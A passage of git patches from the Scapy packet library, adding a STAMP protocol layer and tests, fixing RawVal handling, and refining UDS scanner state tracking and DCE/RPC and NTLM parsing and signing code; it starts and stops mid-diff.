+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + + References: + * `Simple Two-Way Active Measurement Protocol Optional Extensions + [RFC 8972] `_ + """ + name = 'STAMP Session-Reflector Test' + fields_desc = [ + IntField('seq', 0), + MultipleTypeField( + [ + (TimeStampField('ts', 0), + lambda pkt:pkt.err_estimate.Z == 0), + ], + UTCTimeField('ts', 0, fmt='Q') + ), + PacketField('err_estimate', ErrorEstimate(), ErrorEstimate), + ShortField('ssid', 1), + MultipleTypeField( + [ + (TimeStampField('ts_rx', 0), + lambda pkt:pkt.err_estimate.Z == 0) + ], + UTCTimeField('ts_rx', 0, fmt='Q') + ), + IntField('seq_sender', 0), + MultipleTypeField( + [ + (TimeStampField('ts_sender', 0), + lambda pkt:pkt.err_estimate_sender.Z == 0) + ], + UTCTimeField('ts_sender', 0, fmt='Q') + ), + PacketField('err_estimate_sender', ErrorEstimate(), ErrorEstimate), + ShortField('mbz1', 0), + ByteField('ttl_sender', 255), + NBytesField('mbz2', 0, 3), # 3 bytes MBZ + PacketListField('tlv_objects', [], STAMPTestTLV, + length_from=lambda pkt: pkt.parent.len - 8 - 44), + ] + + +bind_layers(UDP, STAMPSessionSenderTestUnauthenticated, dport=862) +bind_layers(UDP, STAMPSessionReflectorTestUnauthenticated, sport=862) diff --git a/test/contrib/stamp.uts b/test/contrib/stamp.uts new file mode 100644 index 00000000000..b6b6b71f38e --- /dev/null +++ b/test/contrib/stamp.uts @@ -0,0 +1,88 @@ +% STAMP regression tests for Scapy + +# More information at http://www.secdev.org/projects/UTscapy/ + +# Type the following command to launch start the tests: +# $ test/run_tests -t test/contrib/stamp.uts + +############ +# STAMP +############ + ++ STAMP tests + += Load module + +load_contrib("stamp") + += Test STAMP Session-Sender Test (Unauthenticated) +~ stamp-session-sender-test + +created = STAMPSessionSenderTestUnauthenticated( + seq=0x1234, + ts=1234.5678, + err_estimate=ErrorEstimate( + S=1, + Z=0, + scale=0x12, + multiplier=0x34 + ), + ssid=1357 +) +assert raw(created) == b'\x00\x00\x12\x34\x00\x00\x04\xD2\x91\x5B\x57\x3E\x92\x34\x05\x4D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +parsed = STAMPSessionSenderTestUnauthenticated(raw(created)) +assert parsed.seq == 0x1234 +assert parsed.ts == 1234.5678 +assert parsed.err_estimate.S == 1 +assert parsed.err_estimate.Z == 0 +assert parsed.err_estimate.scale == 0x12 +assert parsed.err_estimate.multiplier == 0x34 +assert parsed.ssid == 1357 +assert parsed.mbz == 0 +assert not parsed.tlv_objects + += Test STAMP Session-Reflector Test (Unauthenticated) +~ stamp-session-reflector-test + +created = STAMPSessionReflectorTestUnauthenticated( + seq=0x1234, + ts=1234.5678, + err_estimate=ErrorEstimate( + S=1, + Z=0, + scale=0x12, + multiplier=0x34 + ), + ssid=1357, + ts_rx=4321.8765, + seq_sender=0x4321, + ts_sender=2143.6587, + err_estimate_sender=ErrorEstimate( + S=0, + Z=0, + scale=0x21, + multiplier=0x43 + ), + ttl_sender=111 +) +assert raw(created) == b'\x00\x00\x12\x34\x00\x00\x04\xD2\x91\x5B\x57\x3E\x92\x34\x05\x4D\x00\x00\x10\xE1\xE0\x62\x4D\xD2\x00\x00\x43\x21\x00\x00\x08\x5F\xA8\xA0\x90\x2D\x21\x43\x00\x00\x6F\x00\x00\x00' +parsed = STAMPSessionReflectorTestUnauthenticated(raw(created)) +assert parsed.seq == 0x1234 +assert parsed.ts == 1234.5678 +assert parsed.err_estimate.S == 1 +assert parsed.err_estimate.Z == 0 +assert parsed.err_estimate.scale == 0x12 +assert parsed.err_estimate.multiplier == 0x34 +assert parsed.ssid == 1357 +assert parsed.ts_rx == 4321.8765 +assert parsed.seq_sender == 0x4321 +assert parsed.ts_sender == 2143.6587 +assert parsed.err_estimate_sender.S == 0 +assert parsed.err_estimate_sender.Z == 0 +assert parsed.err_estimate_sender.scale == 0x21 +assert parsed.err_estimate_sender.multiplier == 0x43 +assert parsed.mbz1 == 0 +assert parsed.ttl_sender == 111 +assert parsed.mbz2 == 0 +assert not parsed.tlv_objects + From 4620734096ff9bc1f98af663ee2b87becf8aca6a Mon Sep 17 00:00:00 2001 From: Your Name Date: Tue, 4 Oct 2022 20:41:49 +0100 Subject: [PATCH 0891/1632] Make RawVal work with all field types (continued) This is a continuation of commit #7ba7a25fa41e07243ff7af7c693e2d1ad8af6f6a ("Make RawVal work with all field types (fix for issue #3691)"). This line was missed in the original fix, and covers the case where a field is set after object initialisation. The unit test has also been modified to cover this case. --- scapy/packet.py | 3 ++- test/scapy/layers/ntp.uts | 15 +++++++++++---- 2 files changed, 13 insertions(+), 5 deletions(-) diff --git a/scapy/packet.py b/scapy/packet.py index 31188931664..7f64ecd525f 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -469,7 +469,8 @@ def setfieldval(self, attr, val): any2i = lambda x, y: y # type: Callable[..., Any] else: any2i = fld.any2i - self.fields[attr] = any2i(self, val) + self.fields[attr] = val if isinstance(val, RawVal) else \ + any2i(self, val) self.explicit = 0 self.raw_packet_cache = None self.raw_packet_cache_fields = None diff --git a/test/scapy/layers/ntp.uts b/test/scapy/layers/ntp.uts index 255415ba695..7a939bfdadd 100644 --- a/test/scapy/layers/ntp.uts +++ b/test/scapy/layers/ntp.uts @@ -1115,26 +1115,33 @@ pkt_1 = NTP( sent=RawVal(time_stamp), ) +# This field is intentionally set here, rather than in the constructor above, +# to cover a different code path: +pkt_1.recv = RawVal(time_stamp) + assert (isinstance(pkt_1.precision, RawVal)), type(pkt_1.precision) assert (isinstance(pkt_1.dispersion, RawVal)), type(pkt_1.dispersion) assert (isinstance(pkt_1.orig, RawVal)), type(pkt_1.orig) assert (isinstance(pkt_1.sent, RawVal)), type(pkt_1.sent) +assert (isinstance(pkt_1.recv, RawVal)), type(pkt_1.recv) assert (pkt_1.precision.val == precision, pkt_1.precision.val) assert (pkt_1.dispersion.val == dispersion, pkt_1.dispersion.val) assert (pkt_1.orig.val == time_stamp, pkt_1.orig.val) assert (pkt_1.sent.val == time_stamp, pkt_1.sent.val) +assert (pkt_1.recv.val == time_stamp, pkt_1.recv.val) time_stamp_hex = 0x00000000e67d6774 pkt_2 = NTP( precision=236, dispersion=Decimal('0.948455810546875'), orig=time_stamp_hex, - sent=time_stamp_hex + sent=time_stamp_hex, + recv=time_stamp_hex ) raw_pkt = (b"#\x02\n\xec\x00\x00\x00\x00\x00\x00\xf2\xce\x7f\x00\x00\x01\x00" - b"\x00\x00\x00\x00\x00\x00\x00\xe6}gt\x00\x00\x00\x00\x00\x00\x00" - b"\x00\x00\x00\x00\x00\xe6}gt\x00\x00\x00\x00") + b"\x00\x00\x00\x00\x00\x00\x00\xe6}gt\x00\x00\x00\x00\xe6}gt\x00" + b"\x00\x00\x00\xe6}gt\x00\x00\x00\x00") -assert raw(pkt_1) == raw(pkt_2) == raw_pkt \ No newline at end of file +assert raw(pkt_1) == raw(pkt_2) == raw_pkt From 5d4c0179d2e6785401e08e1d92e62e800d75edd5 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 5 Oct 2022 22:12:11 +0200 Subject: [PATCH 0892/1632] Improve automotive system state handling (#3746) --- scapy/contrib/automotive/gm/gmlan_ecu_states.py | 5 ++++- scapy/contrib/automotive/uds_ecu_states.py | 9 ++++++++- scapy/contrib/automotive/uds_scan.py | 4 +++- test/contrib/automotive/scanner/uds_scanner.uts | 6 +++--- 4 files changed, 18 insertions(+), 6 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan_ecu_states.py b/scapy/contrib/automotive/gm/gmlan_ecu_states.py index 682f8a93b85..4e118512c4d 100644 --- a/scapy/contrib/automotive/gm/gmlan_ecu_states.py +++ b/scapy/contrib/automotive/gm/gmlan_ecu_states.py @@ -5,7 +5,6 @@ # scapy.contrib.description = GMLAN EcuState modifications # scapy.contrib.status = library - from scapy.packet import Packet from scapy.contrib.automotive.ecu import EcuState from scapy.contrib.automotive.gm.gmlan import GMLAN, GMLAN_SAPR @@ -36,3 +35,7 @@ def GMLAN_SAPR_modify_ecu_state(self, req, state): # type: (Packet, Packet, EcuState) -> None if self.subfunction % 2 == 0 and self.subfunction > 0 and len(req) >= 3: state.security_level = self.subfunction # type: ignore + elif self.subfunction % 2 == 1 and \ + self.subfunction > 0 and \ + len(req) >= 3 and not any(self.securitySeed): + state.security_level = self.securityAccessType + 1 # type: ignore diff --git a/scapy/contrib/automotive/uds_ecu_states.py b/scapy/contrib/automotive/uds_ecu_states.py index 9d29b9cbc9d..47b81f91211 100644 --- a/scapy/contrib/automotive/uds_ecu_states.py +++ b/scapy/contrib/automotive/uds_ecu_states.py @@ -5,7 +5,6 @@ # scapy.contrib.description = UDS EcuState modifications # scapy.contrib.status = library - from scapy.contrib.automotive.uds import UDS_DSCPR, UDS_ERPR, UDS_SAPR, \ UDS_RDBPIPR, UDS_CCPR, UDS_TPPR, UDS_RDPR, UDS from scapy.packet import Packet @@ -22,6 +21,10 @@ def UDS_DSCPR_modify_ecu_state(self, req, state): # type: (Packet, Packet, EcuState) -> None state.session = self.diagnosticSessionType # type: ignore + try: + del state.security_level # type: ignore + except AttributeError: + pass @EcuState.extend_pkt_with_modifier(UDS_ERPR) @@ -37,6 +40,10 @@ def UDS_SAPR_modify_ecu_state(self, req, state): if self.securityAccessType % 2 == 0 and \ self.securityAccessType > 0 and len(req) >= 3: state.security_level = self.securityAccessType # type: ignore + elif self.securityAccessType % 2 == 1 and \ + self.securityAccessType > 0 and \ + len(req) >= 3 and not any(self.securitySeed): + state.security_level = self.securityAccessType + 1 # type: ignore @EcuState.extend_pkt_with_modifier(UDS_CCPR) diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index d597c6af1a8..7c5244646e8 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -675,7 +675,9 @@ def get_security_access(self, sock, level=1, seed_pkt=None): return False if not any(seed_pkt.securitySeed): - return False + log_automotive.info( + "Security access for level %d already granted!" % level) + return True key_pkt = self.get_key_pkt(seed_pkt, level) if key_pkt is None: diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 78a39287c6f..cbcf057ad12 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -228,13 +228,13 @@ assert len(tc.results_without_response) < 10 if tc.results_without_response: tc.show() -assert len(tc.results_with_negative_response) == 17 -assert len(tc.results_with_positive_response) == 8 +assert len(tc.results_with_negative_response) == 20 +assert len(tc.results_with_positive_response) == 5 assert len(tc.scanned_states) == 5 result = tc.show(dump=True) -assert "incorrectMessageLengthOrInvalidFormat received 17 times" in result +assert "incorrectMessageLengthOrInvalidFormat received 20 times" in result ###################### UDS_ServiceEnumerator ################### tc = scanner.configuration.test_cases[2] From ab1dac282bb952344ed45a6ab484dbcee410a310 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 5 Oct 2022 22:25:19 +0200 Subject: [PATCH 0893/1632] Minor DCERPC/NTLM/SMB improvements (#3754) --- scapy/layers/dcerpc.py | 174 ++++++++++++++++------------------- scapy/layers/ntlm.py | 101 +++++++++++++++++++- scapy/layers/smbserver.py | 2 +- test/scapy/layers/dcerpc.uts | 8 +- 4 files changed, 183 insertions(+), 102 deletions(-) diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index be54d8f4f03..710c8d20aac 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -112,6 +112,7 @@ 13: "bind_nak", 14: "alter_context", 15: "alter_context_resp", + 16: "auth3", 17: "shutdown", 18: "co_cancel", 19: "orphaned", @@ -229,7 +230,7 @@ class DceRpc4(Packet): # Exceptionally, we define those 2 here. -class NetlogonAuthMessage(Packet): +class NL_AUTH_MESSAGE(Packet): # [MS-NRPC] sect 2.2.1.3.1 name = "NL_AUTH_MESSAGE" fields_desc = [ @@ -278,7 +279,7 @@ class NetlogonAuthMessage(Packet): ] -class NetlogonAuthSignature(Packet): +class NL_AUTH_SIGNATURE(Packet): # [MS-NRPC] sect 2.2.1.3.2/2.2.1.3.3 name = "NL_AUTH_(SHA2_)SIGNATURE" fields_desc = [ @@ -300,13 +301,17 @@ class NetlogonAuthSignature(Packet): }, ), XLEShortField("Pad", 0xFFFF), - ShortField("Reserved", 0), - XLELongField("SequenceNumber", 0), + ShortField("Flags", 0), + XStrFixedLenField("SequenceNumber", b"", length=8), XStrFixedLenField("Checksum", b"", length=8), - XStrFixedLenField("Confounder", b"", length=8), ConditionalField( - StrFixedLenField("Reserved2", b"", length=24), - lambda pkt: pkt.SignatureAlgorithm == 0x0013, + XStrFixedLenField("Confounder", b"", length=8), + lambda pkt: pkt.SealAlgorithm != 0xFFFF, + ), + MultipleTypeField([ + (StrFixedLenField("Reserved2", b"", length=24), + lambda pkt: pkt.SignatureAlgorithm == 0x0013), + ], StrField("Reserved2", b"") ), ] @@ -333,7 +338,7 @@ class NetlogonAuthSignature(Packet): 0x03: "RPC_C_AUTHN_LEVEL_CALL", 0x04: "RPC_C_AUTHN_LEVEL_PKT", 0x05: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY", - 0x06: "RPC_C_AUTHN_LEVEL_PRIVACY", + 0x06: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY", } @@ -382,30 +387,30 @@ class CommonAuthVerifier(Packet): ( PacketLenField( "auth_value", - NetlogonAuthMessage(), - NetlogonAuthMessage, + NL_AUTH_MESSAGE(), + NL_AUTH_MESSAGE, length_from=lambda pkt: pkt.parent.auth_len, ), lambda pkt: pkt.auth_type == 0x44 and pkt.parent and - pkt.parent.ptype in [11, 12, 13], + pkt.parent.ptype in [11, 12, 13, 14, 15], ), ( PacketLenField( "auth_value", - NetlogonAuthSignature(), - NetlogonAuthSignature, + NL_AUTH_SIGNATURE(), + NL_AUTH_SIGNATURE, length_from=lambda pkt: pkt.parent.auth_len, ), lambda pkt: pkt.auth_type == 0x44 and - (not pkt.parent or pkt.parent.ptype not in [11, 12, 13]), + (not pkt.parent or pkt.parent.ptype not in [11, 12, 13, 14, 15]), ), ], PacketLenField( "auth_value", None, conf.raw_layer, - length_from=lambda pkt: pkt.parent.auth_len, + length_from=lambda pkt: pkt.parent and pkt.parent.auth_len or 0, ), ), ] @@ -416,8 +421,13 @@ def is_encrypted(self): self.auth_value.innerContextToken, (KRB5_GSS_Wrap_RFC1964, KRB5_GSS_Wrap), ) + elif self.auth_type == 0x44: + return (not self.parent or self.parent.ptype not in [11, 12, 13, 14, 15]) return False + def default_payload_class(self, pkt): + return conf.padding_layer + # sect 12.6 @@ -496,25 +506,18 @@ class DceRpc5(Packet): ), lambda pkt: pkt.auth_len != 0, ), - ConditionalField( - TrailerField( - StrLenField( - "auth_pad", - None, - length_from=lambda pkt: pkt.auth_verifier.auth_pad_length or 0, - ) - ), - lambda pkt: pkt.auth_verifier and pkt.auth_verifier.auth_pad_length, - ), ] ) def post_build(self, pkt, pay): - if self.auth_verifier and self.auth_pad is None: + if self.auth_verifier and self.auth_verifier.auth_pad_length is None: # Compute auth_len and add padding auth_len = self.get_field("auth_len").getfield(self, pkt[10:12])[1] + 8 auth_verifier, pay = pay[-auth_len:], pay[:-auth_len] - padlen = (-(len(pkt) + len(pay) - 8)) % 16 + # [MS-RPCE] + # > The sec_trailer structure MUST be 16-byte aligned + # > with respect to the beginning of the PDU Body< + padlen = (-(len(pay) - 8)) % 16 auth_verifier = ( auth_verifier[:2] + struct.pack("B", padlen) + auth_verifier[3:] ) @@ -646,59 +649,6 @@ class DceRpc5PortAny(EPacket): ] -# sec 12.6.4.1 - - -class DceRpc5AlterContext(_DceRpcPayload): - name = "DCE/RPC v5 - AlterContext" - fields_desc = [ - _EField(ShortField("max_xmit_frag", 5840)), - _EField(ShortField("max_recv_frag", 8192)), - _EField(IntField("assoc_group_id", 0)), - # p_result_list_t - _EField(FieldLenField("n_results", None, count_of="results", fmt="B")), - StrFixedLenField("reserved", 0, length=3), - EPacketListField( - "results", - [], - DceRpc5Result, - count_from=lambda pkt: pkt.n_results, - endianness_from=_dce_rpc_endianess, - ), - ] - - -bind_layers(DceRpc5, DceRpc5AlterContext, ptype=14) - - -# sec 12.6.4.2 - - -class DceRpc5AlterContextResp(_DceRpcPayload): - name = "DCE/RPC v5 - AlterContextResp" - fields_desc = [ - _EField(ShortField("max_xmit_frag", 5840)), - _EField(ShortField("max_recv_frag", 8192)), - _EField(IntField("assoc_group_id", 0)), - PadField( - EPacketField("sec_addr", None, DceRpc5PortAny), - align=4, - ), - # p_result_list_t - _EField(FieldLenField("n_results", None, count_of="results", fmt="B")), - StrFixedLenField("reserved", 0, length=3), - EPacketListField( - "results", - [], - DceRpc5Result, - count_from=lambda pkt: pkt.n_results, - endianness_from=_dce_rpc_endianess, - ), - ] - - -bind_layers(DceRpc5, DceRpc5AlterContextResp, ptype=15) - # sec 12.6.4.3 @@ -782,6 +732,38 @@ class DceRpc5BindNak(_DceRpcPayload): bind_layers(DceRpc5, DceRpc5BindNak, ptype=13) + +# sec 12.6.4.1 + + +class DceRpc5AlterContext(_DceRpcPayload): + name = "DCE/RPC v5 - AlterContext" + fields_desc = DceRpc5Bind.fields_desc + + +bind_layers(DceRpc5, DceRpc5AlterContext, ptype=14) + + +# sec 12.6.4.2 + + +class DceRpc5AlterContextResp(_DceRpcPayload): + name = "DCE/RPC v5 - AlterContextResp" + fields_desc = DceRpc5BindAck.fields_desc + + +bind_layers(DceRpc5, DceRpc5AlterContextResp, ptype=15) + +# [MS-RPCE] sect 2.2.2.10 - rpc_auth_3 + + +class DceRpc5Auth3(Packet): + name = "DCE/RPC v5 - Auth3" + fields_desc = [StrFixedLenField("pad", b"", length=4)] + + +bind_layers(DceRpc5, DceRpc5Auth3, ptype=16) + # sec 12.6.4.7 @@ -814,7 +796,7 @@ class DceRpc5Request(_DceRpcPayload): _EField(UUIDField("object", None)), align=8, ), - lambda pkt: pkt.underlayer.pfc_flags.OBJECT_UUID, + lambda pkt: pkt.underlayer and pkt.underlayer.pfc_flags.OBJECT_UUID, ), ] @@ -1861,6 +1843,22 @@ def __init__(self, *args, **kwargs): self.map_callid_opnum = {} super(DceRpcSession, self).__init__(*args, **kwargs) + def _parse_with_opnum(self, pkt, opnum, opts): + # use opnum to parse the payload + is_response = DceRpc5Response in pkt + try: + cls = self.rpc_bind_interface.opnums[opnum][is_response] + except KeyError: + log_runtime.warning( + "Unknown opnum %s for interface %s" + % (opnum, self.rpc_bind_interface) + ) + return + # Dissect payload using class + payload = cls(bytes(pkt[conf.raw_layer]), ndr64=self.ndr64, **opts) + pkt[conf.raw_layer].underlayer.remove_payload() + return pkt / payload + def _process_dcerpc_packet(self, pkt): opnum = None opts = {} @@ -1897,19 +1895,7 @@ def _process_dcerpc_packet(self, pkt): # Try to parse the payload if opnum is not None and self.rpc_bind_interface and conf.raw_layer in pkt: # use opnum to parse the payload - is_response = DceRpc5Response in pkt - try: - cls = self.rpc_bind_interface.opnums[opnum][is_response] - except KeyError: - log_runtime.warning( - "Unknown opnum %s for interface %s" - % (opnum, self.rpc_bind_interface) - ) - return - # Dissect payload using class - payload = cls(pkt[conf.raw_layer].load, ndr64=self.ndr64, **opts) - pkt[conf.raw_layer].underlayer.remove_payload() - pkt = pkt / payload + pkt = self._parse_with_opnum(pkt, opnum, opts) return pkt def on_packet_received(self, pkt): diff --git a/scapy/layers/ntlm.py b/scapy/layers/ntlm.py index 65fec7d5af7..c17d0a985b0 100644 --- a/scapy/layers/ntlm.py +++ b/scapy/layers/ntlm.py @@ -55,6 +55,8 @@ from scapy.sessions import StringBuffer from scapy.supersocket import SSLStreamSocket, StreamSocket +from scapy.layers.tls.crypto.hash import Hash_MD5 + from scapy.compat import ( Any, Callable, @@ -913,7 +915,7 @@ def received_ntlm_token(self, ntlm_tuple): ) else: ExportedSessionKey = KeyExchangeKey - self.SigningSessionKey = ExportedSessionKey # For SMB + self.SigningSessionKey = ExportedSessionKey # [MS-SMB] 3.2.5.3 super(NTLM_Server, self).received_ntlm_token(ntlm_tuple) def set_cli(self, attr, value): @@ -1130,14 +1132,40 @@ def MD4(x): return Hash_MD4().digest(x) -def RC4K(key, data): +def RC4Init(key): """Alleged RC4""" from cryptography.hazmat.primitives.ciphers import Cipher, algorithms algorithm = algorithms.ARC4(key) cipher = Cipher(algorithm, mode=None) encryptor = cipher.encryptor() + return encryptor + + +def RC4(handle, data): + """The RC4 Encryption Algorithm""" + return handle.update(data) + + +def RC4K(key, data): + """Indicates the encryption of data item D with the key K using the + RC4 algorithm. + """ + from cryptography.hazmat.primitives.ciphers import Cipher, algorithms + algorithm = algorithms.ARC4(key) + cipher = Cipher(algorithm, mode=None) + encryptor = cipher.encryptor() return encryptor.update(data) + encryptor.finalize() +# sect 2.2.2.9 - With Extended Session Security + + +class NTLMSSP_MESSAGE_SIGNATURE(Packet): + fields_desc = [ + LEIntField("Version", 1), + StrFixedLenField("Checksum", b"", length=8), + LEIntField("SeqNum", 0), + ] + # sect 3.3.2 @@ -1150,6 +1178,75 @@ def NTOWFv2(Passwd, User, UserDom): def NTLMv2_ComputeSessionBaseKey(ResponseKeyNT, NTProofStr): return HMAC_MD5(ResponseKeyNT, NTProofStr) + +# sect 3.4.4.2 - With Extended Session Security + +def MAC(Handle, SigningKey, SeqNum, Message): + chksum = HMAC_MD5(SigningKey, struct.pack("\xaf\xed\xf65\xf0\xf9\xf25\x89\xf5\xc5r\xe6;t\xf5\x80 \x80~\xf6\x0cRQ\x0b\xea\xc2}\x8a>\x08\xc9\x04\x9c\xdcOj\xa3\x0c\x82~\xfe\xa6\xa3\x01^ \xee\xd3\xd2yf\xfa\xfbL\xec&\x8b60\xb9\x83j\x84\xa0\xbc*G\xe25\x1a\r\xf3\xc8\xa6ib9\x87\xcbt%\x17\xf8g\x17\x1cIR\xd5\'wW\xbedZbXv\xb7\xe5?#$(\xae\x06\x9e\xce\xe1K\xd9\'\x9fG\xde\xff\xc9j\xd7\xa4\x04\xcb]-\xbcr\xb9+\xdax\xee\xa3\xce\x9c\x15\x0c/\xb2\xcb\xaaF\t\x07/AQM\x18t\xdc\xea\x019\x11TOy\xf7\x7f\xd1\x87\xc7m\xea>\x84Y\xc3\xef\xd0\xa6e\xb0g\xc3\x12\xd9\xc4~$\xb8\xfc/0\x86\x0e0\x8c`5lU\xd1\xbf8\xd2\xcb\xb1%\xfa\xfabr\x10\x9a\xf8\xb7\xb1\x01$wU\x17r\x03Z\xdc\xdd^\xecU\xc1\xf1\x87\xad\xa1\xea\xd8\xf2\x82\xa8\x95\xd4\xd2\xc6\x8e\xf1\xcfN1k\xdc\xc3\xf7o]q\'a\xa3Y\r97\xfe.8O\xf9\xa7\x93\xd3\x99?K\x8bv.\xac=t\r\xba\xca\xd0\x82\xd8\x81\xaf\xe6cv\xbe\xcbN\x93\x9d\x0e\xd4\x119d\x83/u\xc8\xb2\x1c/q\xf0"\xc4\x04\xadB\xe3N\xed\xbbR\xc4yO\x1fQ\xdd}\xd2\xe3c\x1e\xec\xc7\xc4\xf8\xf6OV\xe5\x00*\xb0\t\xbd\xf0\xe5j\xbf\xa3\xe0\x85\xa0\x81\xc6\xb96\xb9\xec\xd7I\x16_\xe7K\xb2D\xad\xb5\x7fG\xb9\x9by\xe2\xd9\xcf\xe7J\x83Y-\xa7:\xa3\x16\xe7\xce\xf9\xf5\xeb\x88z&Je\xcb\x94\'\xdc?\xbf\xed!\x1a\xb3sI\xb5o\x00\x8dJ\xd9\xed\x160+\x11nD\xd0QIo]A\xc0\x89\xa8\xb2\xc9\xb6\xc7,\xf0V\x8a\xae\xa6\x97\x8e\x91tO\x8c\x94\x08\xf1ru\x87e\x0bq6\x8aZ\xb9\xf3\xb7\xbb\xaf;\x89\xdf\x8b\xbf\tA\xef\xe3\x07\x0fT\xed\xbb\x072\x8eQ\xf4\xce\x194A\\w\xb4\x88\xff[\xcf\x91N\x1b\xfb\xe3\xcb~\xe9\xfc\x195\x0f&96\x05\x9a\xe4\xc0~\xd9\x0b\xfd\xbc\xc9\x8fTXY\x9f\xe4\x87e!\x93$$\x0b\xfc\xe7Jm8\x18\xb5\xad\xff\x85\xc3\xe2%\xd5{\x8bs\xa7\xb0\x1e\x0ei\xfc\xc2\x9d\x95\xd4\x83\xba"\x80\xee7^\xda\x02\x8b\x01\'\xe5e\x18\xa9}i\xbe\x86\xf4\x93\x9c\xe6\xe5\xf3\xd2\xa8\x8dH\\\x14\x89+yc\xa7kZ\x80\xe0\xb1\xc3\xd1\xa5\x8a9\xd9\xe7\x8d\xfd\x90\x04B\xce0\xeaK\xa1\xbc\xc1*\x8a\xfd*oX\xa0\x8b\x04D\xbc\x87\xacH\x97\x89\x85\xb2b\xf4F\xa2\xf1m\x06\xfe\x01\xd2\xcbT\x01+\x89<\x05q0ibL\x99[C\xeb\xcfx#i4\x8b\xbb\xb5ZP\x12?\x8b\xa5\x0e\x91"@aJ\t\t\x86\xa5*\t\xbf\x01Q\xa5\x85y\xad\xc0\xa7\xb2l5R\xd4\x85\xf4\xab\n\t\rJb\xf2\x875\xfcL\x16\xb0e\x17\xe1\xdc<\xd1\xee\x86\x01\xefHD\x1eb\xd1\xd1\xbby\xd41\xb7#\xef$DN\xda)\x8f\xb9\xffEa\xfe\xd8C\xb9\xff}\x85ra\xca\xec\xe1\xf6\x99\t\xa1\xc9H\x97\xd7\xc2\xa7\xbbW_\x1a\x92\xed\xb7\xde\xba*\r\x1e%h\xbdu)/\xd8m\xc0\xa9\xfb\xa1\xb5\xa3\xc3\x81\x18\xcd6\xd8t\x06\xa7\xd8\x84\xf5\x80\xb3\xaaX&\x8a\x7fPZ\x04\xcbsn.,b\xdfW\xd0\x7f\xc5\xc90 \x95S\x13*42R\x16fY\xeb\xd2\x05\xbd\x18Wm\xc0\xa1\x9dpYk\xaa\xd9\xd9+\x030\x9a\xe4IMlbfL\x81\xef[H]\xc6:\x88\x9cjE\x11\xce%\xd6\xe2<\x7f\xaaDO\x06\xaf\x13g&FX\x05\x90\xefl\x14\x12P;\xdc\xe7N\x0fU1C\xd1u#\xca\xf9\x12\xe6\xf7\x1bT\x17z\x97\xf2\xf5GH\xe3e\xbe\xe0\xeb?\xc2u\x9e#\x1c\xed\xcf7\x04c\x14\x90\xfc\x07\x1b\xedX\x1a\xd4\xbf\x96T\xee\xe7\x01^@\xcfSG\xd5\x899\x01\xf9\xc3\xf3(\xc2?^\xcd[,\xd85*\xdd\xab\xb6t\xc7p\xc4\xd3\x95\x9d\x02 \x9a^\x81\xb1.y\x9d\xc8\xe7\xb46\xfc\xc7,\x9fI\x03\\R\x83Y3+\xa7\x1f\x00\xd0\x16J\x10\x9a\xc5\'9)\xab\x93\x05\xd7\xb6\x12\xde \r\xc5b\x8bKo36\xfej\xa7\t\xd1{}a\x7f\xa4\xc3\xdc\xaaA\xe5\xe3\x91Uzw\xb2w\xee^\xcd\xd0i\xb7\xc0\xff`D\x06\x04\x00\x00\x00\x00\x00\x13\x00\x1a\x00\xff\xff\x00\x00\xb6\xb0D"\x11h\x92_\xe2 +\x06b%\x7f\xf5\x87O\x00\x08\x81\ro\xcd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -assert len(pkt.auth_pad) == 4 assert pkt.auth_verifier.auth_pad_length == 4 -pkt.auth_pad = None pkt.auth_verifier.auth_pad_length = None +pkt.load = pkt.load[:-4] pkt = DceRpc(bytes(pkt)) -assert len(pkt.auth_pad) == 4 assert pkt.auth_verifier.auth_pad_length == 4 + Check DCE/RPC 4 layer From 44c9a0e1d04c85535cde98190ca8e47b1a3f20b4 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 5 Oct 2022 22:30:29 +0200 Subject: [PATCH 0894/1632] Remove useless junk in Answering machines (#3755) --- scapy/ansmachine.py | 25 ------------------------- scapy/layers/dns.py | 7 ++++--- scapy/layers/inet.py | 8 +++++--- scapy/layers/l2.py | 2 +- scapy/layers/netbios.py | 4 ++-- test/answering_machines.uts | 10 ++++++++++ 6 files changed, 22 insertions(+), 34 deletions(-) diff --git a/scapy/ansmachine.py b/scapy/ansmachine.py index 7232b31dcd6..88127e57fc6 100644 --- a/scapy/ansmachine.py +++ b/scapy/ansmachine.py @@ -209,31 +209,6 @@ def sniff(self): sniff(**self.optsniff) -class AnsweringMachineUtils: - @staticmethod - def reverse_packet(req, mirror_src=False): - # type: (Packet, bool) -> Optional[Packet] - from scapy.layers.inet import IP, TCP, UDP - from scapy.layers.inet6 import IPv6 - if IP in req: - resp = IP( - dst=req[IP].src, - src=mirror_src and req[IP].dst or None, - ) - elif IPv6 in req: - resp = IPv6( - dst=req[IPv6].src, - src=mirror_src and req[IPv6].dst or None, - ) - else: - return None - for layer in [UDP, TCP]: - if req.haslayer(layer): - resp /= layer(dport=req.sport, sport=req.dport) - break - return cast(Packet, resp) - - class AnsweringMachineTCP(AnsweringMachine[Packet]): """ An answering machine that use the classic socket.socket to diff --git a/scapy/layers/dns.py b/scapy/layers/dns.py index 2c7718cef59..4d5bd88ef61 100644 --- a/scapy/layers/dns.py +++ b/scapy/layers/dns.py @@ -15,7 +15,7 @@ import warnings from scapy.arch import get_if_addr, get_if_addr6 -from scapy.ansmachine import 